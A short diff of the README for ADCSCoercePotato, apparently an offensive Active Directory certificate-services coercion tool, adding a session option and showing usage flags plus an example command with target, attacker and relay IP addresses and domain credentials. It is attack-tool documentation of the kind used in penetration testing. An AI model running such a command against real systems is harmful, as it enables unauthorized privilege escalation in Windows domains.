MzHmO/ADCSCoercePotato/README.md

 -u Domain Username
 -p password
 -d Domain Name
+-s session (it seems not working, idk why)

 Example: ADCSCoercePotato.exe -m 192.168.212.22 -k 192.168.1.88 -u myuser -p mypass -d mydomain.domain
          On the Linux box (assuming it has IP:192.168.1.88 and the Windows attacker machine is:192.168.1.89)